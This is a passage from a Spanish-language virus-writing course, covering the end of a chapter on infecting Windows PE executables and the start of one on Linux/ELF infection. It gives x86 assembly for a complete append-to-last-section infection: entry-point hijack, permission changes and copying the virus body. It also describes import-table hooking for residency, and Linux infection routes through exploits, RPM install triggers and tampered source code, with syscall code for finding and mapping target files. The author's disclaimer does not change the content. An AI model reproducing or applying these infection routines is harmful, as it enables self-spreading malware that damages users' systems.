La tabla de secciones es un array de varias estructuras (un array de la misma longitud que el nmero de secciones). As, va a haber una estructura fija para describir a cada seccin, que se repetir tantas veces como secciones haya (y de forma secuencial en el fichero). Para acceder a esta tabla, lo que haremos ser coger el principio de la cabecera PE, sumarle 18h (tamao de la File Header), buscar el esta File Header el tamao de la OptionalHeader y sumrselo tambin. As, tendremos la direccin en la que comienza la tabla de secciones para poder leer. De toda esta informacin haremos caso a los cuatro primeros datos y al ltimo; si nuestra intencin al infectar es meternos dentro de una seccin (el mtodo ms standard, aunque se puede crear otra), tendremos que modificar el VirtualSize, calcular el nuevo SizeOfRawData y modificarlo, cambiar las Characteristics para poder hacerlo Writeable y Executable en caso de que no lo fueran, y acceder a la seccin a travs de la VirtualAddress. El alignment va a ser el genrico del fichero e indicado en la Optional Header (por defecto, 200h, el tamao de un sector en disco). - Secciones Ya nada es tan sencillo como dividir las cosas en "cdigo, datos y pila". Precedidas por un ".", que Microsoft indica como imprescindible pero que no lo es en la prctica, cada seccin de un fichero PE va a cumplir una funcin determinada, y he aqu el significado de algunas de las secciones ms comunes: .text -> Este es el nombre habitual de la seccin de cdigo. Normalmente con flags de ejecucin y permiso de lectura, pero no de escritura. .idata -> Tabla de importaciones; se trata de una estructura que contiene las APIs importadas por el fichero PE as como las libreras de las cuales las importa. .edata -> Tabla de exportaciones, ms propia de ficheros DLL (libreras dinmicas API), con las APIs que el ejecutable exporta. .bss -> Seccin de datos sin inicializar; no ocupa espacio en el disco duro, pues hace referencia a espacio de memoria que ha de reservarse para datos que de por s no vienen inicializados al comenzar el ejecutable, pero que s van a ser utilizados por este. .data -> Datos inicializados, aquellos que tienen valor cuando comienza la ejecucin del programa y que por tanto ocupan espacio en disco. .reloc -> Tabla de realocaciones. Se trata de un ajuste para instrucciones o referencias a variables, dado el hecho de que en ocasiones se ha de cargar el fichero en una direccin distinta de memoria, y las referencias a memoria han de ser reajustadas. Teora sobre infeccin de ficheros PE Utilizaremos en esta explicacin el "mtodo 29A", consistente a grandes rasgos en la
ampliacin de la ltima seccin del ejecutable y la copia del virus al final de esta seccin, de modo que pertenezca a esta. Lo primero que se suele hacer, tras abrir y mapear el fichero EXE, es comprobar si es adecuado para la infeccin; obtenido el inicio de la cabecera PE, lo bsico que hay que ver es lo siguiente: //-La cabecera es efectivamente PE/0/0? // //-Existe una optional header? Sino, nos despediremos // //-El fichero es ejecutable? // Todo ello lo podemos resumir en el siguiente cdigo: mov bx,word ptr ds:[eax+03ch] ; Suponiendo EAX = base address add edx,ebx ; Cabecera PE mov bx,word ptr ds:[edx] ; Cogemos la cadena "PE" en BX cmp bx,'PE' jnz cerramos ; Si no lo es, cerramos or word ptr ds:[0014h+edx],0 ; Existe la optional header? jz cerramos ; Si el valor es cero, adios mov ax,word ptr ds:[016h+edx] ; El fichero es ejecutable? and ax,0002h jz unmap_close Hecho esto, y dado que queremos meternos en la ltima seccin, el siguiente paso ser localizar esta ltima seccin. Ojo, que aunque en la mayora de los ficheros la ltima seccin fsicamente en el fichero es tambin el ltimo registro en la tabla de secciones, esto no es necesariamente as. Para comprobar cul es efectivamente la ltima, cogeremos la tabla de secciones e iteraremos buscando cul es la que tiene una RVA mayor; as, estaremos muchsimo ms seguros. Por tanto, sigamos con cdigo: mov esi,edx ; EDX en PE/0/0, obtenemos offset de la tabla de secciones add esi,18h mov bx,word ptr ds:[edx+14h] add esi,ebx movzx ecx,word ptr ds:[edx+06h] ; numero de secciones ; La cuestin es seguir recorriendo la tabla, comparando lo siguiente: cmp dword ptr [edi+14h],eax jz Not_Biggest La seccin que tenga ese campo en [seccin+14h] ms alto, ser la que infectemos al ser la ltima. Entonces, qu debemos hacer ahora para continuar la infeccin?. En primer lugar aumentaremos la VirtualSize de la seccin segn el tamao de nuestro virus para dejarle espacio (pues nuestro objetivo es infectar aumentando el tamao de la ltima seccin y metindonos dentro). El problema, reside en que no slo hemos de tener en cuenta la VirtualSize, sino tambin otro dato llamado SizeOfRawData, que ha de ser divisible por el "alignment" Qu es el "alignment"? Pues es un nmero al que est redondeada la SizeOfRawData y que se puede encontrar en la cabecera del PE (normalmente es 200h, 512 en decimal, para alinear respecto a sector del disco). As, si tuviramos un nuevo "VirtualSize" de 5431h con nuestro virus, en SizeOfRawData el valor sera de 5600h. Cdigo? S, vayamos con cdigo:
mov eax,virus_size xadd dword ptr ds:[esi+8h],eax ; la VirtualSize push eax ; VirtualSize antigua add eax,virus_size ; Eax vale la nueva VirtualSize mov ecx, dword ptr ds:[edx+03ch] xor edx,edx div ecx ; dividimos para ver el numero de bloques xor edx,edx inc eax mul ecx ; multiplicamos por el tamao de bloque mov ecx,eax mov dword ptr ds:[esi+10h],ecx ; SizeOfRawData Hecho esto, el siguiente paso va a ser cambiar el entry point del programa (el punto donde comienza a ejecutarse) de modo que apunte hacia nosotros. La idea, es que el virus se ejecute primero y, sin ser advertido, pase el control al programa principal. As pues guardaremos el antiguo entry point (que est en el desplazamiento 28h respecto a la file header) y calcularemos el nuevo haciendo que apunte al final de la seccin que vamos a infectar; es decir, el punto en el que vamos a copiar el virus completo. pop ebx ; VirtualSize - virus_size (lo habiamos empujado en "VirtualSize antigua") add ebx,dword ptr ds:[esi+0ch] ; + la RVA de la seccin mov eax,dword ptr ds:[edx+028h] ; Guardamos el viejo entry point mov dword ptr ds:[edx+028h],ebx ; Ponemos el nuevo Lo siguiente que hay que tocar es el campo "characteristics" de la tabla. En l, nos interesa hacer que la seccin pueda leerse, escribirse y ejecutarse para que nuestro virus tenga total libertad. Este campo es tipo "mscara de bits", 32 bits cada uno de los cuales tiene un determinado significado. Tres de ellos los vamos a poner a uno para tener estos permisos, con una orden como "or [edx+024h] , 0C0000000h". Los valores que puede tomar la seccin Characteristics son los siguientes (que se combinan entre s en una mscara de bits): Flag Descripcin 0x00000020h La seccin contiene cdigo (normalmente unido al flag de ejecucin, 0x80000000h) 0x00000040h La seccin contiene datos inicializados 0x00000080h Contiene datos sin inicializar 0x00000200h Contiene comentarios u otro tipo de informacin 0x00000800h Los contenidos de esta seccin no deberan situarse en el EXE final (informacin para el compilador) 0x02000000h La seccin puede ser descartada, el proceso no la necesita al ejecutar 0x10000000h Seccin que puede compartirse (para DLLs, por ejemplo) 0x20000000h La seccin es ejecutable 0x40000000h Pueden leerse datos de esta seccin 0x80000000h Pueden escribirse datos en esta seccin. Despus de esta modificacin en las Characteristics, ajustaremos tambin el tamao de SizeOfImage, referente al fichero en su totalidad y que tambin ha de estar alineado al mismo estilo que el "alignment" (que como dije, est en [FileHeader+03ch]). Esta vez no necesitaremos dividir; si hemos guardado el SizeOfRawData antiguo y el nuevo (recordad, el que est alineado) de la seccin, no hay ms que restar ambos y ver cuanto resulta. Esto, se lo sumamos al SizeOfImage con una instruccin como "add [edx+050h], eax" si eax
contiene esta diferencia entre// SizeOfRawData(nuevo)-SizeOfRawData(antiguo)//. Qu nos queda por hacer? Pues muy poco por suerte, tan slo copiar nuestro virus en el hueco que hemos hecho al ampliar el tamao de la ltima seccin. Teniendo en EDI la base del fichero mapeado (para aadirle las RVAs): add edi,dword ptr ds:[esi+14h] ;14h = PointerToRawData, inicio de la seccion add edi,dword ptr ds:[esi+8h] ;8h = VirtualSize, aadimos el tamao de la seccion sub edi,virus_size ;Le restamos el tamao del virus lea esi,[ebp+virus_start] ;ESI en el principio de nuestro virus mov ecx,virus_size ;ECX = Tamao del virus rep movsb ;Copiamos todo el virus Y no hace falta nada ms para poder decir que hemos infectado un ejecutable de Windows. Haciendo una breve recapitulacin de los pasos a dar podemos ver que, aunque puede sonar a que son muchas cosas, en realidad no se trata de algo tan complejo. Para infectar, pues, debemos: //-Buscar la ltima seccin del fichero // //-Aumentar su tamao en N, tal que N = Tamao del virus -Recalcular tamao de la seccin alineada y del fichero alineado // //-Cambiar el entry point para que apunte al final de la seccin // //-Poner permisos de lectura/escritura/ejecucin en la seccin // //-Copiar el virus en el hueco creado, su primer byte en el nuevo entry point. // Con esto acabamos entonces la infeccin de ficheros de formato Portable Ejecutable. Residencia Per-Process Residencia per-process Hasta ahora hemos tenido la limitacin consistente en que al infectar lo nico que hacamos era repasar el directorio actual con FindFirst/FindNext copindonos a los ficheros ejecutables que encontrramos. Esto puede dejar al virus aislado e impedir una verdadera reproduccin; una solucin sera por ejemplo tras dar este repaso copiarnos a todos los ficheros del directorio Windows (existe una API que nos soluciona bastante trabajo llamada GetWindowsDirectory, que combinada con SetCurrentDirectory nos permitira lanzarnos al ncleo). No obstante, bajo Win32 se pueden utilizar tcnicas que rompan esta limitacin de zonas de infeccin; hablo de la residencia, aunque en este caso una residencia limitada dado que se reduce al proceso actual. Quienes trabajaran con virus en Ms-Dos recordarn la forma en que hacamos que un
programa fuera residente en memoria; toqueteando los MCBs (Memory Control Blocks) nos hacamos con un espacio en memoria e interceptbamos llamadas a funciones normalmente de la Int21h como "AbrirFichero", etc. Entonces, cuando se abra un fichero, el virus lo infectaba caso de ser infectable. Pues bien, aqu existe una tcnica muy parecida, que dado que se reduce al proceso en el que estamos trabajando, se conoce como "residencia per-process". Los ejecutables de Windows se dedican a importar funciones de distintas libreras, entre otras de la ms importante, Kernel32.DLL. Dentro del cdigo del ejecutable, se llama a estas funciones. Pero, y si pudiramos meternos en medio de estas llamadas, capturarlas y actuar en consecuencia?. Pues ah reside el inters de esta tcnica. El fichero importa una serie de APIs, nosotros buscamos la que nos interesa (por ejemplo, //FindFirst/FindNext//) y la parcheamos. En la tabla de importaciones del fichero que est ejecutndose vamos a tener informacin acerca de las APIs importadas y las direcciones a las que se va a llamar cuando se utilicen estas APIs. Por tanto, lo que haremos ser cambiar estas direcciones que nos interesan para que apunten a nuestro cdigo. Luego, haremos normalmente la llamada a la API, pero al mismo tiempo procuraremos infectar aquello con lo que el fichero est jugando. No hay ms que imaginar el gran aliado que puede ser un antivirus que recorra todo el disco duro si le parcheamos las funciones de FindFirst/FindNext! No dar cdigo explcito para este tipo de tcnica, pues es algo que resulta interesante que cada uno desarrolle utilizando los conocimientos que pueda adquirir sobre Windows; llevar a cabo estas rutinas, donde tendremos que tener en cuenta las importaciones y nuestro propio virus, asegura - creo yo - entender bastante ms a fondo la forma que tiene Windows de manejar sus procesos. Slo aclarar, eso s, el formato de la tabla de importaciones (aunque como dije, nada como los textos de Matt Pietrek). Primero, que la RVA a esta tabla puede encontrarse en el PEFileHeader + 080h por defecto (recordad que este tipo de residencia se hace respecto al fichero en el que el virus se est ejecutando, con lo que si el virus est ejecutndose en 040A013h quiz el principio del programa est en 0400000h). La tabla de importaciones es un array de estructuras de datos llamadas Image_Import_Descriptor, uno por cada DLL importada, y con un aspecto como el siguiente: Desp Tamao Nombre Descripcin 00h DWORD //Characteristics //Puntero a una lista de HintNames 04h DWORD //TimeDateStamp //Fecha de construccin, normalmente a cero 08h DWORD //ForwarderChain //Para forwarding de funciones (escasamente documentado) 0Ch DWORD //Nombre //RVA a una cadena ASCII con el nombre de la DLL
10h DWORD //FirstThunk //Puntero a una lista de ImageThunkData Y qu hago yo con esto? Tranquilidad, an no est todo explicado... el array de HintNames y el de Image_Thunk_Data son dos tablas que van a hacer referencia a una lista de nombres de funcin, slo que por lados diferentes. Pero el array del HintName no est necesariamente presente en los ficheros PE, con lo que el campo que nos va a importar es el que apunta a FirstThunk en ImageThunkData. El tamao de cada entrada en esta lista es de un DWORD, y cuando estamos hablando de un fichero cargado en memoria (porque se est ejecutando, ojo), cada entrada en ese array es la direccin de una API de la DLL correspondiente. Qu debemos hacer entonces? Miramos adonde apunta ese desplazamiento 10h, y recorremos el ImageThunkData viendo las RVAs a las que apunta. Cmo identificar desde aqu las APIs utilizadas? Siempre podemos obtenerlas con GetProcAddress y despus mirar si coinciden las entradas en ImageThunkData (aunque como ver quien se lance a hacerlo, esto no es exctamente as...). Cmo parchear las funciones? Bien, la tabla de importaciones suele tener permiso de escritura activado, con lo que no hay ms que hacer que apunte a nuestro cdigo... Un ltimo apunte; esta es una de esas tcnicas que, bien hecha, funcionan para cualquier versin de Windows... con lo que si queremos mantener la compatibilidad, es de las mejores opciones que tenemos. Con este objetivo, existen tambin algunas otras, desde jugar con el registro o infectar el fichero Kernel32.DLL a crear VxDs (por as decirlo DLLs que funcionan a nivel supervisor), en fin, un mundo por descubrir... Y... vaya, con esto llega a su final la sptima entrega del curso de programacin de virus; de aqu a la octava, infeccin bajo Linux.
Curso gratis creado por Wintermute . 22 Febrero 2006 Movistar Per Movistar 4 Mbps + Tv HD a s/. 69. Adems Antivirus y Aula 365 GRATIS www.movistar.com.pe Anuncios Google
< anterior | 1 .. 14 15 16 17 18 | siguiente >
Disclaimer y dems No se iba a librar el sistema operativo Linux de que le metamos nuestras zarpas, verdad? Es curioso, porque mucha gente tiene esa opinin de "Ja! Linux jams puede ser infectado, no te esfuerces!", frase tras la cual vuelven a sentirse seguros en sus Linux sin preocuparse siquiera por averiguar si esto es cierto. Lamentablemente este es el tipo de actitud que le lleva a uno a confiarse y no ver los agujeros de seguridad que pueden traer problemas. Nunca hay que decir "jams", siempre alguien encontrar una manera; y la actitud correcta consiste en localizar esos agujeros y taparlos para construir un sistema operativo ms robusto y fiable, o algn da el usuario de Linux se encontrar con una infeccin a la que no sabr hacer frente. Tapar agujeros de seguridad es algo que no podemos hacer con Windows, pues solo ellos pueden repasar todos los boquetes que tiene; y no lo va a hacer porque se lo digamos. Sin embargo Linux es un sistema operativo que todos pueden ayudar a construir, con lo que programar virus que utilicen posibles huecos de seguridad puede convertirse en una tarea loable al advertir de problemas que puedan existir en este sistema. Tampoco nos engaemos; por suerte no es sencilla una infeccin masiva en Linux, puesto que los sistemas de privilegios en acceso a ficheros y dems unido a la costumbre de compilar uno mismo el cdigo, evitan de forma razonablemente buena esta posibilidad. Los usuarios de Linux no se envan ejecutables attacheados en emails cuyo texto diga cosas como "enanito si, pero con unos coj...", email ante el cual picaron unos cuantos usuarios de Windows cuando sali el Hybris de Vecna. Pero precisamente creo que el hecho de esta dificultad es lo que llama la atencin en Linux e impulsa a uno a intentar atacarlo, cmo programar virus para un sistema operativo supuestamente tan seguro e inexpugnable? Pues bien, ms o menos es acerca de lo que vamos a hablar en esta entrega del curso de programacin de virus. Un ltimo detalle; como dije en la entrega sobre infeccin en Win32, la programacin de virus es algo de por s interesante y que no necesita de que putees a nadie con un virus que hayas programado. El virus se reproduce igual en tu disco duro que en el de otros, y si lo que te interesa es ese rango de cosas que engloba la vida artificial, analizar un sistema
operativo para sacar sus agujeritos o buscar fallos de seguridad... qu diferencia hay si no lo sueltas?. Distribuir un virus no tiene ningn sentido, slo conseguirs joder a pobres usuarios que, aunque tu virus no tenga cdigo destructivo, temern que si lo tenga... y que puede que en respuesta formateen su disco duro o algo peor, que equivaldra a que tu cdigo tuviera cdigo destructivo. No me puedo hacer responsable de lo que hagis con esta informacin, pero por lo menos os doy un poquito la chapa ;-), aunque, como digo, dudo que alguien a quien realmente le interesa el tema y est haciendo un esfuerzo importante para aprender e investigar, le quede tiempo para la estupidez de soltar el virus... el placer, est en programarlos. Introduccin a Linux Estrategias de aproximacin a Linux Lo primero que vamos a tener en cuenta es que Linux es sin duda un sistema operativo mucho mejor protegido que Windows. Vamos a estar limitados a los permisos del usuario que ejecute el fichero infectado, y tendremos que actuar en consecuencia. Una de las formas de plantear virus para Linux ser la de conseguir estos privilegios de root, con lo que podremos hacer lo que nos venga en gana. No es tan fcil, de todos modos, y podemos citar las siguientes estrategias: - Solucin: Algoritmo del avestruz. Consistente en no hacer nada. Es decir, nosotros infectamos revisando los permisos de los ficheros, o ni siquiera los revisamos y cuando la escritura falla actuamos en consecuencia no infectando el fichero. Esta parece en principio la peor solucin, dado que la accin reproductora del virus est muy limitada, aunque tampoco se puede decir que sea una mala solucin; la esperanza estara entonces en que sea ejecutado por el superusuario y entonces aprovechar para instalarse en todos los lugares posibles del sistema, especialmente en sbin/init :-) -Solucin: Uso de exploits. Consistira en buscar alguna falla del sistema para poder hacerse superusuario y poder infectar sin problemas. El defecto de esta solucin es evidente; Linux se revisa constantemente, y los nuevos kernels o versiones del programa afectado llevaran ese fallo parcheado, con lo que el virus perdera su efectividad. Se trata, ms bien, de una solucin para sistemas Windows ;) -Solucin: Windows/VMWare. Dado que Linux est tan protegido, se puede uno aprovechar del hecho de que la mayor parte de la gente que tiene Linux instalado utiliza tambin Windows (aunque le cueste admitirlo xD). La cuestin es que un infector multiplataforma para Windows y Linux podra leer dirctamente la tabla de particiones del disco o discos duros, localizar la particin Linux y a travs de Windows, momento en que el sistema de ficheros de Linux no est protegido, infectar leyendo las propias tablas de inodes los ficheros ELF, de cabeza a por el //sbin/init//. Con este mtodo, aunque es un tanto difcil y pesado de llevar a cabo (manejar a mano los ficheros con nuestras propias funciones puede ser un tanto tedioso), tenemos la inmensa ventaja de que infectando algn proceso importante podramos posteriormente meternos donde nos de la gana, y que se podran realizar ataques a travs de aplicaciones tan populares como VmWare (que puede
ser fcilmente detectado dado que para su funcionamiento utiliza un ring que no es ni 0 ni 3 en la mquina virtual, lo cual se puede detectar en la terminacin de los descriptores de segmento). - Solucin: Infeccin de RPMs. Una de esas cosas sensibles y con escasa seguridad para un ataque de virus son los ficheros de Redhat Packet Manager o RPM; cada vez es ms usual distribuir programas en este formato. Pero este formato tiene unas caractersticas muy particulares, que unidas al hecho de que suele ejecutarse como root su instalacin, lo muestran como otra forma de acceder a Linux a travs de virus informticos. Atacar al SO Linux En este punto encontramos pocas salidas; siempre puede encontrarse un exploit en el kernel de Linux que nos d privilegios de ring0 en el procesador con lo que podamos hacer lo que queremos, pero ese exploit sabemos que ser corregido, con lo que el virus perder en poco tiempo su funcionalidad. El sistema de proteccin de memoria bajo Linux est muy bien desarrollado, y no hay forma en circunstancias normales de salir del modo usuario de ejecucin (ring3) para hacer en superusuario lo que nos venga en gana. En Windows s se hace, pero tambin es cierto que nadie corrige bugs en Windows... Bajo Linux, tenemos una divisin de memoria que sita 3/4 partes de las direcciones virtuales de memoria (00000000h a C0000000h) para procesos de usuario, y 1/4 para el kernel (0C0000000h a 0FFFFFFFFh) El anillo de ejecucin del procesador (hay dos, el ring0 o superusuario y ring3 o usuario) se ve fcilmente en el descriptor de segmento al que se refiere la parte a la que se intenta acceder. Sus dos ltimos bits indican el RPL o modo de ejecucin, estando los dos activados para ring3 y ninguno para ring0. Bajo Linux precisamente se inicializan cuatro segmentos bsicos, para cdigo y datos en kernel y procesos de usuario; 010h y 018h son cdigo y datos del kernel respectivamente, y 23h y 2bh para cdigo y datos de procesos de usuario. 010h -> Kernel -> 00010000b 018h -> Kernel-> 00011000b 023h -> Usuario -> 00100011b 02bh -> Usuario -> 00101011b La pregunta entonces, dado que no podemos acceder a la zona reservada a kernel ms all de la direccin de memoria C0000000h, es, cmo entonces podemos acceder a funciones de manejo de disco, etc, si normalmente estamos en ring3?. Para eso se implementan las interrupciones, y en particular la bsica de la API de Linux, la int 080h (tambin hay otro sistema equivalente para compatibilidad con otros Unix como Solaris que utiliza Lcalls, aunque no tenemos nada que hacer aqu) Al llamar a la int 080h, el procesador consulta una tabla de vectores de interrupcin, saltando a la direccin indicada para esta interrupcin y pasando automticamente a ring 0.
Por lo tanto podemos hacer esta llamada, pero no podemos modificar ni la indicacin del lugar al que salta, ni aquello que hay dnde salta; as pues lo que nos proporcionar la int 080h es la API bsica del sistema operativo, que puede ir desde la modificacin de ficheros al manejo de sockets. De hecho, todo el tiempo cuando programemos virus, utilizaremos esta funcin 080h para utilizar la API de Linux. Como conclusin entonces, la que ofrec antes; que la nica forma de atacar esto es buscar algn exploit, lo cual no es un trabajo sencillo y que tiene el gran inconveniente de que va a servir de poco cuando se saque un parche. Utilizando la API: Buscando archivos La forma de llamar a la API del sistema y en particular la que vamos a utilizar, va a ser muy parecida a lo que hacamos en Ms-Dos. Vamos a poner en AL el valor de la funcin a la que queremos llamar, y en el resto de registros (ordenados como eax-ebx-ecx-edx-etc) diversos parmetros de nuestra llamada a funcin. Veamos una mini-lista de funciones que se pueden utilizar con la int80h (ojo, hay muuuuuchas ms, esto es solo orientativo; se pueden encontrar listas completas en linuxassembly.org): || 1 || sys_exit || Salir del programa en ejecucin || || 2 || sys_fork || Hacer un "fork" del proceso (esto significa, "dividirlo" en dos procesos y programar de modo que cada uno siga una lnea de ejecucin) || || 3 || sys_read || Lectura de un fichero/dispositivo || || 4 || sys_write || Escritura en un fichero/dispositivo || || 11 || sys_execve || Ejecucin de un programa || || 21 || sys_mount || Montar un sistema de ficheros || || ... || sys_... || ... || Ahora veamos la primera funcin que nos va a interesar; es la funcin Open. Tras haber sacado el Delta Offset como hacamos en Windows (eso es algo que traspasa fronteras y sistemas operativos xD), podramos hacer algo como esto: mov eax,05h lea ebx,[diractual+ebp] xor ecx,ecx xor edx,edx int 080h diractual: db '.',0 Vale, qu significa esto? Pues nada ms y nada menos que una llamada a "Open", que realizamos sobre el directorio actual (el '.' en diractual). En Linux la forma de hacer el FindFirst/FindNext que hacamos en Windows es bastante diferente a como lo hacamos en Windows; tendremos que abrir el directorio para luego ir leyendo sus contenidos con la API ReadDir. Curiosamente esta es de las partes ms difciles cuando uno se pone desde a cero para escribir un virus en Linux, pues veremos que aunque Linux est muy documentado, en algunos casos la documentacin no es correcta (y que nadie se asuste si digo que ms de una vez al hacer cosas no habr ms remedio que leerse los fuentes del kernel para ver cmo se hace). El caso es que lo siguiente que tenemos que hacer es llamar a la rden ReadDir, que nos va a leer una entrada de ese directorio que acabamos de abrir. Una forma de hacerlo es lo siguiente:
mov eax, 059h ; readdir lea ecx, [buffer + ebp] int 080h or ax,ax jz fallo El parmetro en ECX va a apuntar a un buffer de un tamao 10Ah, que es la estructura de fichero que nos va a devolver esta llamada. As, en esta estructura tendremos diversos datos sobre el ejecutable (veamos lo que nos dice sobre ella dirent.h en el kernel): struct dirent { long d_ino; off_t d_off; unsigned short d_reclen; char d_name[256]; /* We must not include limits.h! */ }; Lo ms importante es lo que tenemos en el desplazamiento 0Ah respecto al principio de la estructura; el nombre del fichero (el primer valor es un long, 4 bytes, el segundo es un puntero, 4 bytes, el tercero es un short, 2 bytes). A partir de l, podremos abrirlo, mapearlo en memoria y finalmente realizar nuestro objetivo; infectarlo. El resto de valores son el inode (d_ino) correspondiente, el offset respecto a la entrada de directorio (d_off) y el tamao del nombre (d_reclen) presente en d_name. Apertura y proyeccin en memoria Tal y como hicimos en Windows, en Linux vamos a aprovechar el hecho de que se nos permite mapear ficheros en memoria. Es decir, que en lugar de utilizar un puntero para leer y escribir sobre l, podemos proyectarlo sobre una zona de memoria y escribir sobre ella como si lo hiciramos en el fichero. Despus, al cerrarlo, los cambios que hayamos realizado se guardarn. mov eax, 5 lea ebx, [buffer + 0Ah + ebp] mov ecx, 2 xor edx, edx int 080h Parte de esto es muy comprensible; s, 05h es una funcin que ya conocemos, la de apertura del fichero. Ebx sin duda est apuntando al nombre del fichero, necesario para abrirlo, mientras que ecx tiene como valor un "2". Qu significa esto? Bien, significa que queremos acceder en lectura/escritura. No har falta comprobar si tenemos acceso al fichero, si no tenemos permiso la llamada fallar y buscaremos otro. El parmetro EDX en esta llamada hace referencia a un "modo" en caso de que el fichero no exista y lo estemos creando, pero sin duda este no es el caso. La cosa es que esto nos ha devuelto un "handler" referente al fichero, y nos lo ha devuelto en EAX. Con este descriptor vamos a seguir actuando, y el caso es que lo siguiente que querremos hacer ser aumentar el tamao del fichero para que se adapte a nuestros deseos; si lo vamos a mapear en memoria, querremos poder acceder a l compltamente.
Lo siguiente que hagamos al abrir un fichero entonces, ser averiguar cual va a ser su longitud, y para esto tenemos una llamada a la funcin Lseek, la cual tiene como nmero de funcin el 13h. Teniendo tras el anterior cdigo el handler o descriptor en eax, hacemos lo siguiente: mov ebx, eax mov eax, 013h mov ecx, 0h mov edx, 2h int 080h El tamao que pongamos en ECX es lo realmente importante, pero va a ir respecto a EDX. Pero en qu sentido? Pues bien, en EDX vamos a indicar una de tres posibilidades, SEEK_SET, SEEK_CUR y SEEK_END (valores decimales 0, 1 y 2). Con la primera opcin, ECX indica el nmero de bytes del fichero de forma absoluta. Con SEEK_CUR, se hace respecto a la posicin del puntero de bsqueda ms ECX bytes... y por fin, con SEEK_END, ser el tamao del archivo ms ECX bytes... as, en esta ocasin vamos a tener 0 en ECX y 2 en EDX, para averiguar el tamao del fichero (en EAX) y usarlo posteriormente... ojo, que estamos hablando de un virus que infecta "cavity" (luego veremos qu significa), con lo que el tamao del fichero no va a aumentar. Bien, ya tenemos el fichero abierto y sabemos su tamao, qu es lo siguiente? Pues a no ser que seais masocas y querais jugar con punteros, lo mejor es mapear el fichero en memoria. Y para ello vamos a tener que llamar a la syscall mmap, encargada de ello. Si vemos una descripcin, es la siguiente: void *start (dword, preferred memory address or, NULL) size_t length(dword, file size) int prot (dword, PROT_READ/WRITE/EXEC) int flags (dword, MAP_SHARED/PRIVATE/FIXED) int fd (dword, Linux file descriptor) off_t offset Y lo que diremos aqu ser... otiaaaaaaaa que de parmetros, no? Y eso me cabe en los registros? Pues no... pero es que en Linux hay dos formas de llamar a la API del sistema a travs de la int80h, dependiendo de la cantidad de parmetros que haya que meterle (suena algo burro pero es as). El caso es que cuando suceda como en este caso, Linux va a suponer que en EBX ponemos un puntero a todos esos parmetros, y los va a sacar de ah. Lo ms sencillo como podis suponer, es meter esos parmetros en la pila y luego hacer un mov ebx,esp antes de llamar a la funcin, de manera que no tenemos que gastar espacio en nuestro programa ni nada por el estilo (lo cierto es que utilizar la pila para guardar datos es una maravillosa costumbre que optimiza mucho xD, por algo es lo que siempre se usa para las variables locales en funciones, pero eso es otra historia). //Veamos un ejemplo prctico de cmo hacerlo: // push 0 push ebx ; el handler o file descriptor push 1 ; privado push 3 push eax ; lo que nos devolvi la llamada a la int anterior push 0 ; NULL para que nos indique la direccin donde lo mapea mov ebx, esp mov eax, 0x5a int 080h cmp eax,0xFFFFF000 ; La comprobacin de error que hace mmap.c jbe Continuar Con esto, deberamos de haber abierto el fichero mapeado en memoria, y en EAX tendramos la direccin base a partir de la cual ha sido mapeado. La comprobacin de error que hago (cmp eax, 0xFFFFFF000h / jbe Continar) es as en el cdigo de mmap.c (la
syscall est mal documentada y da problemas a veces al comprobar si existe algn fallo si se sigue el procedimiento "standard"). Vistas estas cosas acerca de la API que vamos a tener que utilizar para infectar (por suerte no vamos a tener que hacer cosas tan terribles como hacamos en Windows para tener que sacar las direcciones de la API al basarse en llamadas a la int80h), ya podemos empezar a hablar de ejecutables ELF en Linux.
Curso gratis creado por Wintermute . 22 Febrero 2006 Excel Avanzado - Arequipa Domine y Aproveche el potencial de MS Excel 2010. Inicio: 20 Junio www.bsgrupo.com Anuncios Google
< anterior | 1 .. 14 15 16 17 18 | siguiente >
Infeccin de ficheros ELF Ficheros en Linux En Linux bsicamente tenemos los siguientes objetivos posibles (aunque como siempre, el lmite a lo que podemos infectar lo pone nuestra imaginacin): -El formato a.out (casi no utilizado ya) es extremadamente vulnerable, puesto que su cabecera slo indica el punto de comienzo de la ejecucin y los tamaos y situacin de las secciones. Infectar un fichero a.out es casi tan sencillo como con un COM de Ms-Dos, no consistira ms que en aumentar el tamao de la seccin de cdigo, escribir el virus en ese tamao que se ha aumentado y cambiar el puntero de comienzo de ejecucin para que apunte al virus. -Los ficheros RPM, el standard RedHat que algunas distribuciones importantes (RedHat, SuSe) usan para instalar paquetes, tambin son un bocado delicioso: en resumen no son ms que archivos que contienen una serie de archivos comprimidos con gzip, slo que con algo por lo que en dos y windows muchos escritores habrian dado un brazo. Esto son los "triggers", que son eventos que suceden cuando uno instala a ciegas su paquete rpm; y estos "triggers" consisten en shell scripts, con lo que suponiendo que un paquete infectado as se instale como root, para qu decir ms... -Otro punto interesante en Linux es, por supuesto, infectar cdigo fuente; el C permite ensamblador in-line con lo que los sources de linux se convierten en un objetivo delicioso y difcil de descubrir, aunque tiene un alto riesgo de ser descubierto por cualquiera con ciertos conocimientos de C, al menos para saber que "eso no debera estar ah". -Finalmente, est el formato ELF; este es el formato ejecutable standard bajo Linux, y ser nuestro objetivo principal; por ello, entramos ms en detalle sobre l. Carga en memoria en Linux
El formato ELF es curiosamente mucho ms sencillo que infectar que el PE de Windows, y nos permite una interesante variedad de mtodos. Explicar de modo sencillo como afecta la estructura a la ejecucin: Cuando un fichero ELF es ejecutado, es decir, cuando escribimos su nombre en el shell, suceden una serie de cosas; primero, el shell llama a la funcin execve() de las libc, la libc llama al kernel con sys_execve(), el cual abre el archivo mediante do_execve(), busca el tipo de ejecutable con la funcin interna search_binary_handler(), carga las libreras en caso de ser ELF que este necesite mediante load_elf_binary(), crea el segmento de cdigo para el programa y finalmente mediante una llamada a start_thread(), pasa a ejecutarse el cdigo del programa. Linux asigna permisos a las pginas de memoria del programa (la memoria est dividida en pginas de 4Kb que tiene asignados permisos de lectura, escritura y ejecucin), dividiendo en varios segmentos el fichero; en un modelo sencillo podramos decir que encontramos cdigo datos y pila (y por ejemplo, el cdigo tendr permisos de lectura y ejecucin, mientras que el cdigo los tendr de escritura y lectura, pero no de ejecucin). Un modelo sera este: Cdigo Datos inicializados Datos sin inicializar (espacio libre) Pila Entorno del programa (argumentos pasados, variables de entorno y nombre del fichero ejecutable) Determinado esto, se sitan en estos segmentos las secciones individuales; por ejemplo, la .text representa normalmente la de cdigo, .data los datos inicializados, .bss datos sin inicializar, .stack la pila, adems de otros que a veces son compltamente intiles (como la .comment o la .notes). Curiosamente, tambin las secciones tendrn permisos individuales aunque pertenezcan a un segmento cuyos permisos ya han sido dados, pero Linux no hace ni caso y usar el indicado en el segmento al que pertenecen. Precisamente, esto va a facilitar mucho las cosas a la hora de infectar estos ficheros, puesto que podremos trabajar a nivel de segmento y olvidarnos de estar tan pendientes de las secciones por separado (que 